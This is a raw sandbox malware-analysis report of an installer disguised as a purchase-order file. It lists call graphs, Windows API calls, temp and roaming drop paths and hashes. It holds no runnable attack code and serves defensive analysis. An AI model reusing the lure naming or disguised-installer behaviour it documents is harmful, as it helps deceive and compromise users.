5588->5583 5591 405a23 2 API calls 5588->5591 5593 4048ad 5588->5593 5592 404886 MulDiv 5589->5592 5589->5593 5591->5588 5592->5593 5594 404ab9 21 API calls 5593->5594 5604 40491e 5593->5604 5596 40490b 5594->5596 5595 40140b 2 API calls 5597 404941 5595->5597 5599 404920 SetDlgItemTextW 5596->5599 5600 404910 5596->5600 5611 4041bc KiUserCallbackDispatcher 5597->5611 5599->5604 5602 4049f0 21 API calls 5600->5602 5601 40495d 5601->5603 5612 4045ca 5601->5612 5602->5604 5603->5560 5604->5595 5604->5597 5606->5550 5607->5577 5608->5557 5609->5578 5610->5586 5611->5601 5613 4045d8 5612->5613 5614 4045dd SendMessageW 5612->5614 5613->5614 5614->5603 5615 4027b5 5616 402b3a 18 API calls 5615->5616 5617 4027c3 5616->5617 5618 4027d9 5617->5618 5620 402b3a 18 API calls 5617->5620 5619 405bd3 2 API calls 5618->5619 5621 4027df 5619->5621 5620->5618 5641 405bf8 GetFileAttributesW CreateFileW 5621->5641 5623 4027ec 5624 402895 5623->5624 5625 4027f8 GlobalAlloc 5623->5625 5628 4028b0 5624->5628 5629 40289d DeleteFileW 5624->5629 5626 402811 5625->5626 5627 40288c CloseHandle 5625->5627 5642 40330f SetFilePointer 5626->5642 5627->5624 5629->5628 5631 402817 5632 4032f9 ReadFile 5631->5632 5633 402820 GlobalAlloc 5632->5633 5634 402830 5633->5634 5635 402864 WriteFile GlobalFree 5633->5635 5637 403062 46 API calls 5634->5637 5636 403062 46 API calls 5635->5636 5638 402889 5636->5638 5640 40283d 5637->5640 5638->5627 5639 40285b GlobalFree 5639->5635 5640->5639 5641->5623 5642->5631 5643 4028b6 5644 402b1d 18 API calls 5643->5644 5645 4028bc 5644->5645 5646 4028f8 5645->5646 5647 4028df 5645->5647 5651 402793 5645->5651 5649 402902 5646->5649 5650 40290e 5646->5650 5648 4028e4 5647->5648 5656 4028f5 5647->5656 5657 405f8c lstrcpynW 5648->5657 5652 402b1d 18 API calls 5649->5652 5653 405fae 18 API calls 5650->5653 5652->5656 5653->5656 5656->5651 5658 405ed3 wsprintfW 5656->5658 5657->5651 5658->5651 5659 404337 5661 404469 5659->5661 5662 40434f 5659->5662 5660 4044d3 5663 4045a5 5660->5663 5664 4044dd GetDlgItem 5660->5664 5661->5660 5661->5663 5668 4044a4 GetDlgItem SendMessageW 5661->5668 5667 40419a 19 API calls 5662->5667 5670 404201 8 API calls 5663->5670 5665 404566 5664->5665 5666 4044f7 5664->5666 5665->5663 5672 404578 5665->5672 5666->5665 5671 40451d 6 API calls 5666->5671 5669 4043b6 5667->5669 5690 4041bc KiUserCallbackDispatcher 5668->5690 5674 40419a 19 API calls 5669->5674 5675 4045a0 5670->5675 5671->5665 5676 40458e 5672->5676 5677 40457e SendMessageW 5672->5677 5679 4043c3 CheckDlgButton 5674->5679 5676->5675 5681 404594 SendMessageW 5676->5681 5677->5676 5678 4044ce 5682 4045ca SendMessageW 5678->5682 5688 4041bc KiUserCallbackDispatcher 5679->5688 5681->5675 5682->5660 5683 4043e1 GetDlgItem 5689 4041cf SendMessageW 5683->5689 5685 4043f7 SendMessageW 5686 404414 GetSysColor 5685->5686 5687 40441d SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5685->5687 5686->5687 5687->5675 5688->5683 5689->5685 5690->5678 5691 4014b8 5692 4014be 5691->5692 5693 401389 2 API calls 5692->5693 5694 4014c6 5693->5694 4733 4015b9 4734 402b3a 18 API calls 4733->4734 4735 4015c0 4734->4735 4736 405a82 4 API calls 4735->4736 4746 4015c9 4736->4746 4737 401614 4739 401646 4737->4739 4740 401619 4737->4740 4738 405a04 CharNextW 4741 4015d7 CreateDirectoryW 4738->4741 4743 401423 25 API calls 4739->4743 4742 401423 25 API calls 4740->4742 4744 4015ed GetLastError 4741->4744 4741->4746 4745 401620 4742->4745 4750 40163e 4743->4750 4744->4746 4747 4015fa GetFileAttributesW 4744->4747 4751 405f8c lstrcpynW 4745->4751 4746->4737 4746->4738 4747->4746 4749 40162d SetCurrentDirectoryW 4749->4750 4751->4749 5695 401939 5696 402b3a 18 API calls 5695->5696 5697 401940 lstrlenW 5696->5697 5698 4024e8 5697->5698 5699 40293b 5700 402b1d 18 API calls 5699->5700 5701 402941 5700->5701 5702 402793 5701->5702 5703 402974 5701->5703 5705 40294f 5701->5705 5703->5702 5704 405fae 18 API calls 5703->5704 5704->5702 5705->5702 5707 405ed3 wsprintfW 5705->5707 5707->5702 4964 40173f 4965 402b3a 18 API calls 4964->4965 4966 401746 4965->4966 4967 405c27 2 API calls 4966->4967 4968 40174d 4967->4968 4969 405c27 2 API calls 4968->4969 4969->4968 5708 10002a7f 5709 10002a97 5708->5709 5710 1000158f 2 API calls 5709->5710 5711 10002ab2 5710->5711

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062f6 SHGetFileInfoW call 405f8c GetCommandLineW call 405f8c GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 405a04 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 405a04 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f8c 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405768 ExitProcess 45->57 49 403657-40365e call 40391f 46->49 50 4035c8-4035d3 call 405a04 46->50 59 403663 49->59 63 403621-40362b 50->63 64 4035d5-40360a 50->64 61 403815-40381d 56->61 62 40377e-40379b call 4062f6 * 3 56->62 59->45 69 403823-403827 ExitProcess 61->69 70 40381f 61->70 92 4037e5-4037f3 call 4062f6 62->92 93 40379d-40379f 62->93 67 403692-4036ac lstrcatW lstrcmpiW 63->67 68 40362d-40363b call 405adf 63->68 65 40360c-403610 64->65 73 403612-403617 65->73 74 403619-40361d 65->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f8c * 2 68->83 70->69 73->74 78 40361f 73->78 74->65 74->78 80 4036d1-4036fa call 405f8c 76->80 81 4036c6-4036cc call 405f8c 76->81 78->63 91 4036ff-40371b call 405fae DeleteFileW 80->91 81->80 83->49 101 40375c-403764 91->101 102 40371d-40372d CopyFileW 91->102 104 403801-40380c ExitWindowsEx 92->104 105 4037f5-4037ff 92->105 93->92 96 4037a1-4037a3 93->96 96->92 103 4037a5-4037b7 GetCurrentProcess 96->103 101->91 107 403766-40376d call 405e26 101->107 102->101 106 40372f-40374f call 405e26 call 405fae call 405703 102->106 103->92 115 4037b9-4037db 103->115 104->61 109 40380e-403810 call 40140b 104->109 105->104 105->109 106->101 122 403751-403758 CloseHandle 106->122 107->45 109->61 115->92 122->101
                                                              APIs
                                                              • #17.COMCTL32 ref: 00403379
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                              • OleInitialize.OLE32(00000000), ref: 0040338B
                                                                • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 00406308
                                                                • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 00406313
                                                                • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                              • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                                • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                              • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",00000000), ref: 004033DB
                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",00000020), ref: 00403403
                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403558
                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403574
                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403585
                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040358D
                                                              • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                              • OleUninitialize.OLE32(?), ref: 0040366C
                                                              • ExitProcess.KERNEL32 ref: 0040368C
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",00000000,?), ref: 00403698
                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe",00000000,?), ref: 004036A4
                                                              • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 004036B0
                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 004036B7
                                                              • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,0041FEA8,?), ref: 00403725
                                                              • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                              • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                              • ExitProcess.KERNEL32 ref: 00403827
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                              • String ID: "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$C:\Users\user\AppData\Roaming\incontemptible\koput$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                              • API String ID: 4107622049-3606323149
                                                              • Opcode ID: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                              • Instruction ID: 3f9bff4532b5a1f920197c5518436c484d8c06ab90e6dd2e991860da6f926746
                                                              • Opcode Fuzzy Hash: ba3fa22631945d2ec692421d63492d0888d6a8f757e4ac1530dcd8c095202370
                                                              • Instruction Fuzzy Hash: 1FC11770604210AAD720BF659D45A2B3EACEB45749F10483FF940B62D2D77D9D41CB7E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 123 405373-40538e 124 405394-40545b GetDlgItem * 3 call 4041cf call 404ad1 GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 40551d-405524 123->125 143 405479-40547c 124->143 144 40545d-405477 SendMessageW * 2 124->144 127 405526-405548 GetDlgItem CreateThread CloseHandle 125->127 128 40554e-40555b 125->128 127->128 129 405579-405583 128->129 130 40555d-405563 128->130 134 405585-40558b 129->134 135 4055d9-4055dd 129->135 132 405565-405574 ShowWindow * 2 call 4041cf 130->132 133 40559e-4055a7 call 404201 130->133 132->129 147 4055ac-4055b0 133->147 140 4055b3-4055c3 ShowWindow 134->140 141 40558d-405599 call 404173 134->141 135->133 138 4055df-4055e5 135->138 138->133 145 4055e7-4055fa SendMessageW 138->145 148 4055d3-4055d4 call 404173 140->148 149 4055c5-4055ce call 405234 140->149 141->133 150 40548c-4054a3 call 40419a 143->150 151 40547e-40548a SendMessageW 143->151 144->143 152 405600-40562b CreatePopupMenu call 405fae AppendMenuW 145->152 153 4056fc-4056fe 145->153 148->135 149->148 162 4054a5-4054b9 ShowWindow 150->162 163 4054d9-4054fa GetDlgItem SendMessageW 150->163 151->150 160 405640-405655 TrackPopupMenu 152->160 161 40562d-40563d GetWindowRect 152->161 153->147 160->153 164 40565b-405672 160->164 161->160 165 4054c8 162->165 166 4054bb-4054c6 ShowWindow 162->166 163->153 167 405500-405518 SendMessageW * 2 163->167 168 405677-405692 SendMessageW 164->168 169 4054ce-4054d4 call 4041cf 165->169 166->169 167->153 168->168 170 405694-4056b7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 4056b9-4056e0 SendMessageW 170->172 172->172 173 4056e2-4056f6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->153
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000403), ref: 004053D1
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004053E0
                                                              • GetClientRect.USER32(?,?), ref: 0040541D
                                                              • GetSystemMetrics.USER32(00000002), ref: 00405424
                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405445
                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405456
                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405469
                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405477
                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040548A
                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004054AC
                                                              • ShowWindow.USER32(?,00000008), ref: 004054C0
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004054E1
                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054F1
                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040550A
                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405516
                                                              • GetDlgItem.USER32(?,000003F8), ref: 004053EF
                                                                • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405533
                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005307,00000000), ref: 00405541
                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405548
                                                              • ShowWindow.USER32(00000000), ref: 0040556C
                                                              • ShowWindow.USER32(?,00000008), ref: 00405571
                                                              • ShowWindow.USER32(00000008), ref: 004055BB
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055EF
                                                              • CreatePopupMenu.USER32 ref: 00405600
                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405614
                                                              • GetWindowRect.USER32(?,?), ref: 00405634
                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040564D
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                              • OpenClipboard.USER32(00000000), ref: 00405695
                                                              • EmptyClipboard.USER32 ref: 0040569B
                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004056A7
                                                              • GlobalLock.KERNEL32(00000000), ref: 004056B1
                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004056C5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004056E5
                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004056F0
                                                              • CloseClipboard.USER32 ref: 004056F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                              • String ID: {$&B
                                                              • API String ID: 590372296-2518801558
                                                              • Opcode ID: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                              • Instruction ID: 4bfa3faa41321a0cadf5913ced3eb51c87a7cc043350d2f69421d7beec3be44d
                                                              • Opcode Fuzzy Hash: a9210c085025f7da69fa84600aad64b98492429c5a621f4d7bb2b68e6941663b
                                                              • Instruction Fuzzy Hash: 92B13971900208BFDB219F60DD89AAE7B79FB04354F00813AFA05BA1A0C7759E52DF69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 405fae-405fb9 420 405fbb-405fca 419->420 421 405fcc-405fe2 419->421 420->421 422 405fe8-405ff5 421->422 423 4061fa-406200 421->423 422->423 424 405ffb-406002 422->424 425 406206-406211 423->425 426 406007-406014 423->426 424->423 428 406213-406217 call 405f8c 425->428 429 40621c-40621d 425->429 426->425 427 40601a-406026 426->427 430 4061e7 427->430 431 40602c-406068 427->431 428->429 433 4061f5-4061f8 430->433 434 4061e9-4061f3 430->434 435 406188-40618c 431->435 436 40606e-406079 GetVersion 431->436 433->423 434->423 439 4061c1-4061c5 435->439 440 40618e-406192 435->440 437 406093 436->437 438 40607b-40607f 436->438 446 40609a-4060a1 437->446 438->437 443 406081-406085 438->443 441 4061d4-4061e5 lstrlenW 439->441 442 4061c7-4061cf call 405fae 439->442 444 4061a2-4061af call 405f8c 440->444 445 406194-4061a0 call 405ed3 440->445 441->423 442->441 443->437 448 406087-40608b 443->448 457 4061b4-4061bd 444->457 445->457 450 4060a3-4060a5 446->450 451 4060a6-4060a8 446->451 448->437 453 40608d-406091 448->453 450->451 455 4060e4-4060e7 451->455 456 4060aa-4060d0 call 405e59 451->456 453->446 458 4060f7-4060fa 455->458 459 4060e9-4060f5 GetSystemDirectoryW 455->459 468 4060d6-4060df call 405fae 456->468 469 40616f-406173 456->469 457->441 461 4061bf 457->461 463 406165-406167 458->463 464 4060fc-40610a GetWindowsDirectoryW 458->464 462 406169-40616d 459->462 466 406180-406186 call 406220 461->466 462->466 462->469 463->462 467 40610c-406116 463->467 464->463 466->441 474 406130-406146 SHGetSpecialFolderLocation 467->474 475 406118-40611b 467->475 468->462 469->466 472 406175-40617b lstrcatW 469->472 472->466 478 406161 474->478 479 406148-40615f SHGetPathFromIDListW CoTaskMemFree 474->479 475->474 477 40611d-406124 475->477 480 40612c-40612e 477->480 478->463 479->462 479->478 480->462 480->474
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 00406071
                                                              • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060EF
                                                              • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406102
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040613E
                                                              • SHGetPathFromIDListW.SHELL32(?,Call), ref: 0040614C
                                                              • CoTaskMemFree.OLE32(?), ref: 00406157
                                                              • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617B
                                                              • lstrlenW.KERNEL32(Call,00000000,004216C8,?,0040526B,004216C8,00000000,00000000,00000000), ref: 004061D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                              • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 900638850-1230650788
                                                              • Opcode ID: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                              • Instruction ID: 5cce0682863fafc60a16059ed1eb0c3d77be7ea2b31a2434558a531189329514
                                                              • Opcode Fuzzy Hash: 2de106b61b6886fe32187f800c53eea30337814e69c8c71d628fafc4fb074f05
                                                              • Instruction Fuzzy Hash: EA61D271A00115AADF209F25CC40AAF37A5EF54314F12813FE906BA2D1D73D99A2CB5E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 481 405814-40583a call 405adf 484 405853-40585a 481->484 485 40583c-40584e DeleteFileW 481->485 487 40585c-40585e 484->487 488 40586d-40587d call 405f8c 484->488 486 4059d0-4059d4 485->486 489 405864-405867 487->489 490 40597e-405983 487->490 496 40588c-40588d call 405a23 488->496 497 40587f-40588a lstrcatW 488->497 489->488 489->490 490->486 493 405985-405988 490->493 494 405992-40599a call 4062cf 493->494 495 40598a-405990 493->495 494->486 505 40599c-4059b0 call 4059d7 call 4057cc 494->505 495->486 499 405892-405896 496->499 497->499 501 4058a2-4058a8 lstrcatW 499->501 502 405898-4058a0 499->502 504 4058ad-4058c9 lstrlenW FindFirstFileW 501->504 502->501 502->504 506 405973-405977 504->506 507 4058cf-4058d7 504->507 521 4059b2-4059b5 505->521 522 4059c8-4059cb call 405234 505->522 506->490 512 405979 506->512 509 4058f7-40590b call 405f8c 507->509 510 4058d9-4058e1 507->510 523 405922-40592d call 4057cc 509->523 524 40590d-405915 509->524 513 4058e3-4058eb 510->513 514 405956-405966 FindNextFileW 510->514 512->490 513->509 517 4058ed-4058f5 513->517 514->507 520 40596c-40596d FindClose 514->520 517->509 517->514 520->506 521->495 526 4059b7-4059c6 call 405234 call 405e26 521->526 522->486 532 40594e-405951 call 405234 523->532 533 40592f-405932 523->533 524->514 527 405917-405920 call 405814 524->527 526->486 527->514 532->514 536 405934-405944 call 405234 call 405e26 533->536 537 405946-40594c 533->537 536->514 537->514
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 0040583D
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,\*.*,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 00405885
                                                              • lstrcatW.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 004058A8
                                                              • lstrlenW.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 004058AE
                                                              • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 004058BE
                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040595E
                                                              • FindClose.KERNEL32(00000000), ref: 0040596D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsu68B6.tmp$\*.*
                                                              • API String ID: 2035342205-3309999000
                                                              • Opcode ID: f73c030cd55cfe5a8dab8208d1cd7d95fcf8e01722a7b63f144a17743666d228
                                                              • Instruction ID: 43b78ede77d9c0270a3625fa09dd856e9a99610c0d190015c3454e79d0f7c46c
